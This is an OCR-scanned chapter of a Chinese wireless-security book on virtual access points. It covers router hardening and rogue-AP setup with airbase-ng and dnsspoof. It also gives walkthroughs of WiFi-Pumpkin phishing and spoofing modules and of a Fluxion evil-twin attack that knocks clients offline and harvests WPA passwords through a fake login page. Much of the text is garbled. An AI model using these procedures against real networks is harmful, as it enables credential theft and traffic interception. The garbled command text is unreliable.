漏洞 ， 找 出 PIN 码 来 暴力 破解 的 。 由 于 这 
个 漏洞 ， 无 论 用 户 的 无 线 密 码 有 多 长 多 复 
杂 ， 通 过 PIN 码 都 可 以 破解 。 

(10) 关闭 UPnP， 对 于 那些 无 用 的 服 
务 ， 建 议 用 户 直接 关 掉 。 

(11) 关闭 无 线 中 继 /桥接 功能 (WDS) 。 
如 果 发 现 被 无 故 开 启 ， 说 明 这 人 台 路 由 器 很 
有 可 能 已 经 被 黑客 控制 了 。 

(12) 关闭 SSD 广播 ， 关 闭 之 后 ， 大 
部 分 人 会 搜索 不 到 路 由 器 设备 ， 这 样 就 可 
以 自己 独 享 网 络 了 这 在 一 定 程度 上 起 到 了 
隐身 作用 。 
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(13) 开启 防 DDoS 功 能 。 这 是 因为 黑 
客 会 通过 DDoS 流量 进行 攻击 ，10s 左 右 ， 用 
户 的 路 由 器 就 会 自动 将 大 部 分 人 踢 下 线 ， 
还 会 出 现 抖动 状态 。 

(14) 开启 用 户 隔离 功能 。 这 样 即 便 
密码 被 破解 ， 黑 客 也 没 法 搜索 到 设备 ， 这 
是 因为 黑客 与 用 户 不 在 同一 个 局 域 网 内 。 
这 对 保护 局 域 网 的 安全 非常 有 用 。 

(15) 采用 增强 认证 。 采 用 8021x 或 者 
Web 认 证 来 进行 账户 和 密码 登录 ， 这 在 一 定 
程度 上 提高 了 无 线 网 络 的 安全 性 。 


手动 创建 AP 


对 于 虚拟 AP 的 创建 ， 用 户 可 以 采用 手 
动 来 创建 ， 下 面 介 绍 在 Windows 与 Linux 两 
种 系统 下 手动 创建 AP 的 方法 。 


9.2.1 在 Windows10 系 统 下 创建 AP 


Windows10 系 统 自 带 了 设置 网 络 共享 
的 功能 ， 可 以 通过 以 下 步骤 设置 一 个 虚拟 
AP。 具 体操 作 步 又 如 下 : 

Ep 右 击 桌面 上 的 “开始 ”按钮 ， 在 弹出 
的 菜单 列表 中 选择 “运行 ”菜单 命令 ， 如 
下 图 所 示 。 


9.2 


step 国 打开 “运行 ”对 话 框 ， 在 其 中 输入 
cmd 命 令 ， 单 击 “ 确 定 ” 按 钮 ， 如 下 图 
所 示 。 


Windows 将 根据 你 所 输入 的 名 称 ， 为 你 打开 框 应 的 程序 ， 
文件 夫 、 文 栏 或 Internet 资源 


打开 (0): | 国 ES 
转 便 用 管理 权限 创建 此 任务 


CJ 吉 


[step 图 打开 “命令 提示 符 ” 窗 口 ， 在 其 中 输 
入 netsh wlan show drivers 命 令 ， 检 查 无 线 网 
卡 是 否 支持 AP 功能 ， 如 果 有 “支持 的 承载 
网 络 : 是 ”信息 ， 证 明 具 有 AP 功能 ， 如 下 
图 所 示 。 


浏览 (B)… 


mode=allow ssid=WiFi key=12345678 命 令 
创建 一 个 无 线 AP， 该 命令 用 于 创建 一 个 名 
称 为 WiFi、 连 接 密码 为 12345678 的 无 线 网 
络 ， 如 下 图 所 示 。 


所 示 。 
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step 图 使 用 netsh wlan start hostednetwork 命 令 ， 启 用 创建 好 的 无 线 网 络 ， 如 下 图 所 示 。 


start hostednetwork 


Step 图 单 击 桌面 上 的 “开始 ”按钮 ， 在 弹出 的 菜单 列表 中 单 击 “ 设 置 ”按钮 ， 如 下 图 


step 园 打开 “设置 ”对 话 框 ， 在 其 中 选择 
“网 络 和 Intermmet” 选 项 ， 如 下 图 所 示 。 


曙 示 器 、 声音” 通知 、 电源 要 牙 . 打印 机 、 息 标 


名 网 络 和 Internet [4 

WLAN、 飞 行 醒 式 、VPN 背景、 钠 屏 、 颜 色 

8 三 地 用 只 帐户 

一 部 载 、 默 闪 应 用 、 可 选 功 能 你 的 帐户 、 电 子 邮 件 、 同 步 设 


置 、 工 作 、 其 他 人 员 


时 间 和 语言 游戏 
A 字 灌区 直 .日期 ® 庆 E、 捕 于 、 广 揪 ， 游戏 模式 


[se 图 打开 “网 络 状态 ”对 话 框 ， 单 击 左 下 
方 的 “网 络 和 共享 中 心 ” 超 链接 ， 如 下 图 
所 示 。 


从 网 络 疑难 解答 
诊断 并 解决 网 络 问题 。 

查看 网 络 属性 

Windows 防火 墙 


网 络 和 共享 中 心 


网 络 重 雪 


EG 国 打开 “网 络 和 共享 中 心 ”对 话 框 ， 单 
击 左 上 方 的 “更 改 适配器 设置 ” 超 链 接 ， 
如 下 图 所 示 。 


控制 面板 主页 


更 改 适 配器 设置 
更 改 高 级 共 享 ; 
媒体 流 式 处 理 选 项 


BO 打开 “网 络 连接 ”对 话 框 ， 在 其 中 可 
以 看 到 多 出 来 的 “本 地 连接 *3” 图 标 ， 如 
下 图 所 示 。 
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| BE vMware Network Adapter =D WLAN 
| 用- VMnet8 趟 连 青 
| BF Be 有 X 8 so0211n use wireless LAN card 


MW MY 


0 Microsoft Hosted Nework Vir BF Reahek pCle GBE Family Contr.. 


[step 图 选择 接 入 外 网 的 网 络 图 标 ， 这 里 以 
“以 太 网 2” 有 线 网 络 为 例 演 示 ， 选 中 以 太 
网 2 并 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “ 属 
性 ”菜单 命令 ， 如 下 图 所 示 。 

和 四 将 局 (6) 


状态 (U) 
诊断 0) 


四 机 (6) 


创建 亿 建 方式 (S) 
© Ws(o) 
罗 至 羡 (M) 


四 届 攻 (RI 区 
step 图 打开 “属性 ”对 话 框 ， 切 换 到 “ 共 
享 ” 选 项 卡 ， 在 “家 庭 网 络 连接 ”下 拉 列 
表 中 找到 “本 地 连接 *3” 并 选中 ， 如 下 图 
所 示 。 


SSTAP 1 

VirtualBox Host-Only Network 
VirtualBox Host-Only Network #2 
VMware Network Adapter VMnet! 


VMware Network Adapter VMnet8 
WLAN 


[step 图 选择 完成 后 ， 单 击 “ 确 定 ” 按 钮 ， 这 
样 便 可 以 创建 一 个 虚拟 AP， 如 下 图 所 示 。 


[PP 
殉 帮 。 # 理 

Internet 连 达 共 享 

回 作 洗 基 人 网 这 用 户 省 比 计划 的 Internet 夺 按 实 按 (N) 


回 各 ## 基 他 网 经 用 广 控制 或 芝 用 共享 的 Internet 连接 (0) 


[es | 
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9.2.2 在 Kali Linux 系 统 下 创建 AP 


虚拟 AP 最 直接 的 方法 就 是 手动 虚拟 
AP 地 址 ， 手 动 配置 虚拟 AP 的 具体 操作 步 
又 如 下 : 

[step 图 通过 airbase-ng -c 1 -e Test-002 
wlan0mon 命 令 ， 便 可 以 虚拟 一 个 AP， 如 下 
图 所 示 。 

a 


Trying to set MTU on wlanenon to 1890 
Access Point with 3SSID E8:4E:06:28:AE:46 started 


64:55:49 


step 回 通过 ifconfig -a 命令 可 以 看 到 多 出 一 块 
at0 的 网 卡 ， 如 下 图 所 示 。 


root@kali; ~# ifconfig -a 

latO: fLagsn4098<BROADCAST,MULTICAST> mtu 1599 
ether e8:4e:06:28:ae:46 txqueuelen 1999 
RX packets @ bytes 9 (9.8 B) 
RX errors 6 dropped 9 overruns 9 Trame 9 
TX packets @ bytes 3 (0.0 6) 
TX errors @ dropped 9 overruns 0 carrier 0 collisions 0 


[se 图 通过 airodump-ng wlan0mon 命 令 监 
听 附 近 AP， 可 以 看 到 已 经 有 Test-002 这 样 
一 个 AP， 并 且 此 时 处 于 OPN 状 态 ， 如 下 图 
所 示 。 


本 TI Eapsegy 69 1 2010-10"20 05:62 


(Ethernet) 


PuR Beacens woata, 4/s CH Ma ENC CIPHER AUTH E55ID 
06+88:3E:0A:18:91 -53 日 上 ee 1 139 opW LE 
:68:A3:7C:B1:B2 -36 日 a 0 5 Sae. opN CNC 
E4168:A3:7C:B1: BO -37 1 0 6 Sde. WpA2 CWp WoT CHCC 
5 9 4 9 56 -1 OPN <length: 0> 
1 2 1 9。 5 495 WPA2 COMP PSK 千 营 科 盾 
-35 p 9 6 S4e, OPN A 
0 5 a 0 5 54 OPN Test-002 
.5 2 9 0 6 405 OPW TPGuest 6073 
2 4 日 日 1 199 wph2 ccmp Psk Test-00l 


侈 提示 : 可 以 使 用 airbase-ng -a < 真实 AP- 
MAC 地 址 > --essid < 真实 AP 的 名 称 > wlan- 
0mon 命 令 ， 完 全 模仿 一 个 真实 AP， 此 时 进 
行 监听 便 不 能 区 分 真实 AP 与 伪 AP， 如 果 伪 
AP 再 增 大 发 射频 率 便 会 徐 盖 真实 AP。 


step 回 使 用 apt-get install bridge-utils 命 令 ， 
安装 一 个 网 桥 工具 ， 如 下 图 所 示 。 


ootHRALTr pt-get InsTtAU DTIHOE-UETUS 
在 读 取 钦 件 包 列表 .,， 完成 

在 分 析 软 件 包 的 依 赔 关 系 鱼 

在 读 取 状态 信息 .,， 充 成 

列 软件 包 是 自动 安装 的 并 且 现 在 不 村 要 了 


Uibx265-168 python-backports.ssl-natch-hostname python-beautifutsoup 
ruby-terninal -table ruby-unicode-display-width 

用 "apt autorenove' 来 若 新 它 (它们 )。 

列 【 新 】 软 件 包 和 将 被 安装 

bridge-utits 

级 了 9 个 软件 包 ， 新 安装 了 1 个 软件 包 , 委 部 并 9 个 钦 件 包 ， 有 9 个 软件 包 未 被 升级 。 


step 图 使 用 brctl addbr bridge 命 令 ， 添 加 一 
个 桥接 接口 ， 并 使 用 ifconfig -a 命 令 查看 
接口 ， 如 下 图 所 示 ， 添 加 一 个 新 的 桥接 
接口 。 
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[raarakarisr ITTCOmTI9 -5 
lbridge: flags=4698<BROADCAST, MULTICAST> mtu 1566 


ether fa:ea:10:81:db:11 txqueuelen 1900 (Ethernet) 
RX packets 9 bytes 9 (6.9 B) 
RX errors @ dropped 9 overruns 6 frane © 


TX packets 9 bytes 9 16.9 B) 
TX errors 9 dropped 9 overruns 6 carrier 9 collisions 6 


Estee 国 执行 brctl addif bridge eth0 命 令 和 brctl 
addif bridge at0 命 令 ， 将 eth0 网 卡 和 at0 网 
卡 加 入 到 桥接 中 ， 分 别 将 其 IP 地 址 配置 为 
0.0.0.0 并 启动 起 来 ， 如 下 图 所 示 。 


root@kali:-# brctl addif bridge ethe | 
root@kali:-# brctl addif bridge at9 
root@kali:-# ifconfig ethe 6.9.9.9 up 
root@kali:-# ifconfig at6 68.0.0.0 up 


执行 ifconfig bridge <ip 地 址 > up 命 
令 ， 将 桥接 网 口 启动 ， 如 下 图 所 示 ， 这 里 
的 人 P 地 址 根据 自己 的 网 络 进行 设置 ， 设 置 的 
是 192.168.157.100。 


Forarnlis 17conTig 
te; flags=4163<UP, BROADCAST,RUNNING, MULTICAST> mtu 1500 

Inets fea0: :eade:6ff;fe28:ae46 prefixlen 64 scopeid gx28<tlnk> 
erher e8:4e:96:28:pe;46 txqueuclen 1999 (Etherner) 

RX packets 0 bytes 0 《6.9 B) 

RX errors 8 dropped © overruns 9 frame © 

TX packets 58 bytes 13118 (12.8 KiB) 

Tx errors 9 dropped 9 overruns @ carrier 日 collisions 日 


bridge: flags=4163<UP,BROADCAST, RUNNING, MULTICAST> mtu 1569 

inet 192, 168,157,189 netmask 255,255.255,0 brondcnst 192.168,157,255 
inet6 fea0;:20c:29tt:fe39:f29c prefixlen 64 scopeid gx29<Link> 
ether 00:80c:29:39:f2:9c txqueuelen 1669 [Ethernet) 

Rx packets 48 bytes 11434 (11.1 KiB) 

Rx errors 8 dropped 9 overruns 9 frane © 

TX packets 10 bytes 796 (796.6 B) 

TX errors @ dropped 0 overruns © carrier © collisions 自 


使 用 route add -net 0.0.0.0 netmask 
0.0.0.0 gw 192.168.1.1 命 令 ， 主 机 添加 一 个 
网 关 ， 并 使 用 netstat -nr 命令 查看 网 关 添 加 
情况 ， 如 下 图 所 示 。 


oT TeESTGE NT 
Kernel IP routing table 


bestanation Gateway Genmask Flags Mss Window irtt Iface 
.ee 192.168.1.1 9.6.9.8 ue on 日 erhe 
je.0.0.6 192.168.1.1 29.0.0.8 ve 00 日 ethg 
32.168.1.9 8.0.0.8 255,255.255.8 Ul 日 日 日 erhg 
92.168.157.0 6.0.0.9 255.255,255.8 _U ED 9 bridge 


[step 图 使 用 echo 1 > /proc/sys/net/ipv4/ip_ 
forward 命 令 ， 添 加 IP 地 址 转发 功能 ， 如 下 
图 所 示 。 

root@kali:-# 
on echo 1 > /proc/sys/net/ipv4/ip forward 


root@kali:-# cat /proc/sys/net/ipv4/ip_forward 
1 


[step 图 新 建 一 个 文件 ， 文 件 格式 为 : IP 地 址 
< 空格 > 域名 ， 如 下 图 所 示 。 


cat /proc/sys/net/ipv4/ip _ forward 


文件 {F) 编辑 (E) 查看 (V) 搜索 (S) | 
127.9.6.1 www.baidu.com 


step 图 使 用 dnsspoof -i bridge -f hosts 命 令 ， 


将 文件 中 的 了 域名 对 应 关系 进行 解析 ， 如 下 
图 所 示 。 下 图 中 可 以 看 到 ， 在 本 机 开启 了 
53 端 口 进 行 DNS 解 析 ， 而 解析 的 规则 则 是 
按照 之 前 做 好 的 配置 文件 来 进行 。 


rootekali: # dnsspoof -1 bridge -让 hosts 
lansspoof: listening on bridge [udp dst port 53 and not src 192 168.157.180] 


9.3 ”使 用 WiFi-Pumpkin 虚 
拟 AP 


WiFi-Pumpkin 是 一 款 图 形 化 工具 ， 它 
并 不 是 Kali 自 带 的 工具 ， 通 过 它 可 以 轻松 实 
现 虚 拟 AP、 移 动 WiFi 等 功能 。 


9.3.1 安装 WiFi-Pumpkin 

由 于 WiFi-Pumpkin 是 扩展 工具 ， 因 此 
需要 下 载 。 下 载 并 安装 WiFi-Pumpkin 工 具 
的 操作 步骤 如 下 : 

使 用 git clone https://github.com/ 
PO0cL4bs/WiFi-Pumpkin.git 命 令 ， 从 github 上 
复制 代码 到 本 机 ， 或 者 直接 从 github 上 下 载 
安装 包 ， 如 下 图 所 示 。 


| 
clone with HTTPS @ 
Use Git or checkout with SVN using the web URL. 


https://github, com/PecL4bs/WiFi-Pumpkin.! 筷 . 


Open in Desktop Download ZIP 


step 图 单 击 Download ZIP 按 钮 ， 可 以 下 载 安 
装 包 。 下 图 为 下 载 后 的 安装 包 。 


WiFi-Pumpkin- 
master.zip 


WiFi-Pumpkin- 
master 


step 图 解压 安装 包 后 查看 安装 包 文件 ， 如 
下 图 所 示 。 至 此 便 完 成 了 WiFi-Pumpkin 的 
下 载 。 
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GatERBUIS-TOGWTGags7WIFI-PUWPKIT-WaSEETTTS 


CHANGELOG iastaller .sh modules wifi-punpkin 
[CONTRIBUTING.md ISSUE TEMPLATE.md plugins wifi-punpkin. desktol 
lore LICENSE README ,md Wifi-pumpkin. py 
Hocs logs requirements ,txt 

Econs ke deb .ss tenplates 


step 园 使 用 ./installer.sh --install 命 令 安 装 软 


usage: /installer.sh --install | --uninstall 
谷中 :1 http://nirrors.neusoft.edu.cn/kali kall-rolling InRetease 回 ， 
正在 读 取 软 件 包 列表 .. 。 完 成 1。 
正在 读 取 软件 包 列表 ... 完成 

正在 分 析 软 件 包 的 依 未 关系 树 

正在 读 取 状 态 信 息 ... 完成 

LibfTi-dev 已 经 是 最 新 版 (3.2.1-8)。 
libffi-dev 已 设置 为 手动 安装 。 
python-pip 已 经 是 最 新 版 (9.8 1-2.3)。 
bython-pip 已 设置 为 手动 安装 。 


安装 过 程 WiFi-Pumpkin 会 自动 查看 依 
闲 包 ， 如 果 存 在 缺少 的 依赖 包 ， 会 自动 下 
载 并 安装 相关 的 依赖 包 ， 如 下 图 所 示 。 


同 盆 同 丁 安 费 下 列 软件 ; 
girl1.2-harfbuzz-9.9 icu-devtools tibgtibz.0-dev libglib2.0-dev-bin 
libgraphite2-dev Libharfbuzz-dev Uibharfbuzz-gobjecte Liblcu-dev 
1ibicu-Le-hb-dev Libpcre16-3 Libpcre3-dev libpcre32-3 libpcrecppev: 
pkg-config 

建议 安 妆 
1ibgtibz.6-doc libgraphite2-utils icu-doc libssl-do 

下 列 【 新 】 软 件 包 将 被 安装 
girl.2-harfbuzz-9.B icu-devtools libglib2.0-dev libglib2.6-dev-bin 
libgraphite2-dev Libharfbuzz-dev libharfbuzz-gobjecte Liblcu-dev 
1ibicu-le-hb-dev Libpcre16-3 libpcre3-dev Libpcre32-3 Libpcrecppev: 
tibsst-dev libxnl2-dev tibxsttl-dev pkg-config 2l1b19-dev 


安装 完成 后 的 结果 如 下 图 所 示 ， 这 里 
也 给 出 了 相应 的 提示 。 


ng dependencies 
-[+] hostapd Installed 


[=] Install WiFi-Pumpkin 

[z] binary::/usr/bin/ 

[zx] wifi-pumpkin installed with success 
[x] execute sudo wifi-pumpkin in termina 
[+] pecL4bs Team CopyRight 2015-2617 

[+] Enjoy 


9.3.2 ”开始 虚拟 AP 


WiFi-Pumpkin 配 置 完成 后 ， 下 面 就 可 
以 虚拟 AP 了 。 具 体 的 操作 步骤 如 下 : 
[se 加 单 去 Settings 选 项 卡 可 以 切换 到 设置 
页 面 ， 如 果 创建 一 个 虚拟 AP 可 以 通过 设置 
Access Point 来 完成 ， 填 入 SSID 的 名 称 、 
BSSID 的 MAC 地 址 (这 里 可 以 随机 也 可 
以 自行 设置 ) 、AP 信 道 、 无 线 网 卡 〈( 可 
以 通过 Refresh 按 钮 来 刷新 获取 ) ， 如 下 图 
所 示 。 
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[step 图 下方 可 以 设置 DHCP 服 务 ， 分 配 IP 

地 址 段 、 网 关 等 选项 ， 设 置 完成 后 可 单 击 ”9.3.3 ”WiFi-Pumpkin 的 其 他 工具 

下 方 的 save settings 按 钮 ， 如 下 图 所 示 。 在 Tools 菜 单列 表 下 有 一 个 ActiveDrift- 
Net 工 具 。 用 于 查看 连接 设备 传输 过 程 中 的 
图 片 信息 ， 如 下 图 所 示 。 


driftnet 


此 时 的 WiFi-Pumpkin 是 一 个 未 运行 状 
态 ， 如 下 图 所 示 。 


start 按 iFi-Pumpki， 言 息 ， 图 所 示 。 
所 示 。 sa daa 


[step 图 实现 数据 监听 ， 此 时 WiFi 列 表 中 会 
多 出 一 个 刚才 设置 的 无 线 ESSID， 使 用 手 
机 接 入 ， 浏 览 网 页 的 数据 可 以 通过 WiFi- 
Pumpkin 查 看 ， 如 下 图 所 示 ， 这 样 便 可 以 抓 
取 流 经 AP 的 所 有 数据 包 。 


Server 菜 单 中 有 两 个 选项 ， 一 个 是 


Phishing Manager， 一 个 是 Windows Up- 
! . , date， 如 下 图 所 示 。 

[step 国 如 果 需 要 使 用 移动 WiFi， 在 Setting 界 面 F 

中 选中 Enable Wireless Security 选 项 。 这 里 

可 以 选择 加 密 方式 以 及 共享 密 钥 ， 如 下 图 
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其 中 Phishing Manager 可 以 用 于 模拟 一 
个 网 页 ， 可 以 从 这 里 虚假 页 面 达到 钓鱼 效 
果 ， 如 下 图 所 示 。 


Phishing Marager ee 


Windows Update 则 模拟 一 个 类 似 Win- 
dows 更 新 程序 或 Java 更 新 程序 ， 向 客户 端 发 
送 数据 包 ， 如 下 图 所 示 。 


Windows Update Attack Generator @ 日 四 


Modules 菜 单 中 包括 五 个 模块 ， 它 们 分 
别 是 WiFi deauthentication 〈 用 户 断 开 客 户 端 
与 AP 连接 ) 、WiFi Probe Request〈 用 于 发 
现 AP) 、DHCP Starvation( 实 现 DHCP 饥 饿 
攻击 ) 、ARP Poisoner( 实 现 ARP 攻 击 ) 以 
及 DNS spoofer( 实 现 DNS 欺 骗 ) ， 如 下 图 
所 示 。 
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e@ WiFi deauthentication: 这 里 可 以 选 
择 一 个 目标 AP 通过 发 送 断 开 连 接 请 
求 ， 中 断 STA 与 AP 的 连接 ， 从 而 抓 
取 握手 信息 ， 如 下 图 所 示 。 


Wireless Deauthentication Attack © © O 


e WiFi Probe Request: 用 于 发 现 AP， 
通过 该 模块 可 以 扫描 附近 的 AP， 如 
下 图 所 示 。 


ProbeRequestwifiMontor © 9 @ 


e DHCP Starvation: 用 于 实现 DHCP 饥 
饿 攻击 ， 一 旦 启动 迅速 占 满 DHCP 
所 分 配 的 下， 如 下 图 所 示 。 


Dhcp Starvation Attack e000e 
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e@ ARP Poisoner: 可 以 扫描 网 段 中 
的 客户 机 ， 通 过 模拟 实现 ARP 攻 
击 ， 如 下 图 所 示 。 


ARP Poisoner 


©00 


e DNS Spoofer: 可 以 实现 DNS 欺骗， 
其 中 可 以 设置 需要 欺骗 的 域名 ， 
配合 Phishing Manager 与 Windows 
Update 构 建 虚假 页 面 或 者 更 新 程 
序 ， 如 下 图 所 示 。 


DNS Spoofer O00 


加 
a 


9.4 使 用 Fluxion 虚 拟 AP 


Fluxion 不 是 Kali 自 带 的 工具 ， 通 过 它 可 
以 虚拟 一 个 AP， 以 便 诱 惑 客户 端 输入 登录 


密码 ， 从 而 获取 无 线 密码 。 使 用 Fluxion 工 
具 虚 拟 AP 的 操作 步骤 如 下 : 

[step 图 使 用 git clone https://github.com/wi-fi- 
analyzer/fluxion.git 命 令 ， 从 github 上 复制 代 
码 到 本 机 ， 或 者 直接 从 github 上 下 载 安装 


包 ， 如 下 图 所 示 。 
Clone with HTTPS @ 


Use Git or checkout with SVN using the web URL. 


Find file 


github.com/wi-fi-analyzer/fluxio 良 


https: 


Open in Desktop Download ZIP | 


解压 安装 包 ， 查 看 安装 目录 文件 ， 如 
下 图 所 示 。 


TooteRaUI 
doc 


aster# LS 
i logo: siteinstaller.p 
caLe README.md site 


step 图 执行 “./fluxion.s”h 肢 本， 检查 数据 
依赖 包 信 息 ， 如 下 图 所 示 。 


fluxion. sh 


[ 

[ FLUXION 2 < Fluxion Is The Futare 
1 

1 


pircrack-ng 
pireplay-ng 
Birmon-ng.. 


Hdhcpd..... 
hostapd. 
iiwconfig 
Nighttpd 
acchanger， 
mdk3.... 
hmap.... 
php-cgi. 
pyrit... 
python 
bnzip. 
kterm... 

ppenssl... 
rfkill.. 
strings. 
fuser- .~ RE 


Not installed 
OK! 
OK1 


ok! 
Not installed 
OK1 


step 国 声 换 到 install 列 表 中 ， 执 行 .Jfluxion.s 
命令 ， 安 装 Fluxion 软 件 ， 如 下 图 所 示 。 


Aircrack-ng 
Aireplay-ng 
mp-ng 


con 
Lighttpd 
Macchange 


Dpenssl 
Php-cgi 
pyrit. 
Python 
rfkill 
Unzip 
Xterm 
strings 
fuser 


[step 图 再 次 执行 “./fluxion.s”h 脚 本 ， 

主 界面 ， 在 这 里 可 以 选择 语言 ， 如 下 图 所 
示 ， 由 于 该 软件 字体 颜色 偏 白 色 所 以 更 换 
为 黑 底 白 字 。 


FLUXION 2 < Fluxion Is The Future > 


2] Select your language 


[1] English 
[2] German 
[3] Romanian 
[4] Turkish 
[5] Spanish 
[6] Chinese 
[7] Italian 
[8] h 
[9] Gr 

[19] French 
[11] Slovenian 


‘@fluxion] -[~] 
[step 较 选择 1 使 用 英语 ， 
下 图 所 示 。 搜 索 通信 信道 ， 如 果 已 知 目标 
的 通信 信道 可 选择 2 指定 信道 ， 不 然 请 选择 
1 全 信道 搜索 。 搜 索 过 程 中 会 打开 一 个 窗 
口 ， 当 扫描 到 所 需 的 WiFi 信 号 ， 按 Ctrl+C 
键 停 止 扫描 ， 建 议 扫描 至 少 30s 以 上 。 


进入 信道 选择 ， 如 


FLUXION 2 < FLuxion Ts The Future > 


[1] 
[2] Specific channel(s) 
[3] Back 


@fluxion] -[~] 


第 9 章 无 线 网 络 中 的 虚拟 AP 技 术 三 


如 下 图 


[step 园 搜索 到 目标 AP 后 可 以 暂停 ， 
所 示 ， 通 过 数字 选择 目标 AP。 


MAC CHAN 。 SECU PWR ESSID 


76:AF:6A:69 


:83:CD:33 
:FA:68:01 


step 图 选择 完 AP 后 可 以 进入 虚拟 AP 界 面 ， 
如 下 图 所 示 ， 这 里 推荐 使 用 第 1 选项 。 


= TeSt-B81 / WPA2 


F:08 (TP-LINK TECHNOLOGIES 50,,LTD， 


2] FakeAP 
3] Back 


efUuxion 


[step 图 提示 虚拟 AP 信息 以 及 保存 文件 路 
径 ， 如 下 图 所 可 以 直接 按 Enter 键 。 


= 1C:Fhi68:91:2F:68 (TP-LINK TECHNOLOGIES CO.,LTD. 


Exanple: /root/Downloads/fluxion-naster. cap) 


Step 图 抓 取 握手 信息 ， 如 下 


1 项 或 第 2 项 都 可 以 。 


图 所 示 。 使 用 第 


[2] Handshake check 
[1] pyrit 
[2] aircrack-ng (Miss chance) 


[3] Back 


@fluxion]-[~j 轩 


step 因 选择 第 1 项 ， 
如 下 图 所 示 。 


[2] *Capture Handshake* 


会 启动 拒绝 请 求 页 面 ， 


[1] Deauth all 
[2] Deauth all [mdk3] 


[3] Deauth target 
[4] Rescan networks 
[5] Exit 


[step 图 选择 第 1 项 ， 中 断 所 有 与 AP 连接 的 客 
户 端 ， 此 时 会 开启 另外 两 个 窗口 用 于 抓 取 
握手 信息 ， 如 下 图 所 示 。 


jet 
LAn 
[6] 
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Capturing data on channel --> 1 eeoe step 图 这 里 会 要 求 创建 一 个 Web 页 面 ， 如 下 
图 所 示 。 这 个 页 面 是 用 于 诱骗 客户 端 输入 


step 图 抓 取 到 握手 信息 后 ，Fluxion 界 面 如 下 
图 所 示 。 选 择 第 1 项 ， 检 查 握手 信息 。 i 


[2] *Capture Handshake* 
选择 伪造 页 面 的 语言 ， 如 下 图 所 示 。 


Status handshake: 


t-801 / WPA2 
[1] Check handshs channel = 1 
peed = 70 Mb 

[2] Back = 1C:FA:68:61:2F;68 (TP-LINK TECHNOLOGIES co.，,LTD 
[3] Select another network 
[4]_ Exit 
#> n NG] (NEUTRA 

D et 
(NEUTRA 
(NEUTRA 


[step 图 验证 通过 后 会 跳 转 到 创建 证 书 界面 ， ; (NEUTRA 
如 下 图 所 示 。 选 择 第 1 项 创建 一 个 SSL 证 书 。 

[Step 加 选择 语言 后 ，Fluxion 会 构建 一 个 虚拟 
eA AP 并 且 将 客户 端 连 接 中 断 ， 人 
[2] Search for SSL certificate 密码 连接 的 ， 此 时 Fluxion 会 开启 多 个 窗口 


le 用 于 检测 用 户 接 入 状态 ， 如 下 图 i 


Certificate invalid or not present, please choice 


LN TECHOLICIES C.D. 


step 图 此 时 手机 登录 会 跳 转 到 一 个 Web 页 面 提示 需要 输入 登录 密码 ， 如 下 图 所 示 。 这 个 人 
码 Fluxion 会 向 真实 的 AP 进 行 验证 ， 输 入 错误 会 提示 错误 ， 直 到 拿 到 真实 密码 。 
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出 错 了 : 您 输入 的 密码 错误 ! 


人 1 


为 了 您 的 安全 考量 , 请 输入 WPA 密 
到 以 重新 连接 网 络 


输入 您 的 WPA 密 码 : 


您 的 无 线 网 络 将 会 在 短 时 间 内 恢复 


实 密码 ， 如 下 图 所 示 。 
eoe 


Wifi Information 


[00:00:00] 1/0 keys tested (136.56 ks) 


Tine left: 


9.5 无线 网 络 入 侵 检测 系统 


WAIDPS 是 一 款 由 Python 编 写 的 无 线 
入 侵 检测 工具 ， 基 于 Linux 平 台 并 且 完 全 
源 。 它 可 以 探测 包括 WEP/WPA/WPS 
在 内 的 无 线 入 侵 与 攻击 方式 ， 并 可 以 收 
集 WiFi 相 关 的 所 有 信息 ， 当 无 线 网 络 中 存 


File Not found in /.SYWorks/WAIDPS/waidps.py 
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在 攻击 时 ， 系 统 会 显示 于 屏幕 并 记录 在 日 
志 中 。 
9.5.1 安装 WAIDPS 


安装 WAIDPS 系 统 是 使 用 该 系统 进行 无 
线 入 侵 检 测 的 前 提 。 安 装 WAIDPS 的 操作 步 
又 如 下 : 
[seep 回 打 开 https://github.com/SYWorks/ 
waidps 链 接 ， 单 击 Clone or download 按 钮 ， 


如 下 图 所 示 。 


Clone with HTTPS @ 


the web URL 


单 击 Download ZIP 按 钮 下 载 压缩 包 
ee 有 三 个 文件 ， 如 下 图 所 示 。 


LICENSE README.md waidps.py 


step 图 切换 到 文件 目录 ， 在 终端 执行 ./ 
waidps.py 命 令 便 可 以 安装 WAIDPS， 首 次 运 
行 会 下 载 一 些 必要 的 文件 ， 如 下 图 所 示 。 


Copy file from [/root/Downloads/waidps-master/waidps-master/waidps.py] to [/.SYworks/WAIDPS/waidps.py ] 


You can now run from 


cd /.SYWorks/WAIDPS/ 


/waidps.py 


Press Any Key To Co 


mac-oui.db 


==> 站 


from http: raw.githubuse 


9 
File successfully saved to /.SYwWorks/Database/mac-oui.db 


5 国 下 载 完成 后 


by doing the following : 


aster/mac-oui.db 


后 按 Enter 键 ， 会 给 出 WAIDPS 系 统 帮 助 信息 ， 如 下 图 所 示 。 
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[step 图 安装 完成 后 WAIDPS 会 在 根 目 录 创 
建 .SYWorks 目 录 ，/.SYWorks/WAIDPS 是 主 
目录 ， 其 中 包含 waidsp.py 脚 本 文件 ， 如 下 
图 所 示 。 


9:52 


启动 WAIDPS 
安装 好 WAIDPS 后 ， 就 可 以 启动 WAIDPS 
了 。 具 体操 作 步 又 如 下 : 


a 
Ny A 
re 


EE 
后 
i 

4 A 


A 


n 1.0, R.6 (Updated - 


SIMI 


CiPneN 


Non 
None 


client : - 
ac 9 


step 国 使 用 WAIDPS 之 前 建议 使 用 airmon-ng 
check kill 命 令 ， 关 闭 不 必要 的 进程 ， 如 下 图 
所 示 。 


:~# airmon-ng check kilU 


illing these processes: 


PID Name 
686 wpa supplicant 


step 图 使 用 airmon-ng start wlan0 命 令 ， 
将 无 线 网 卡 设置 成 monitor 模 式 ， 如 下 图 
所 示 。 


sad mn hn 由 
[step 图 切换 到 WAIDPS 主 目录 ， 使 用 ./ 
waidps.py -i Wlan0mon 启 动 WAIDPS 系 统 ， 
如 下 图 所 示 。 


10 oct 2014) 
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step 国 如 果 没有 做 出 其 他 操作 ， 默 认 等 待 30s 后 进入 扫描 状态 ， 如 下 图 所 示 。 


< < << SUMMARY LISTING >> > > 


10 (9 wps 
4 


图 所 示 。 
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[step 图 在 扫描 状态 下 ，WAIDPS 会 开启 两 个 终 站 


窗口 ， 用 于 抓 取 数据 包 以 及 扫描 AP， 如 下 
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CH 14 3C Elops 


wm 


step 较 通过 按 Enter 键 ,切换 到 命令 模式 ， 如 下 图 所 示 。 


[Enter] 


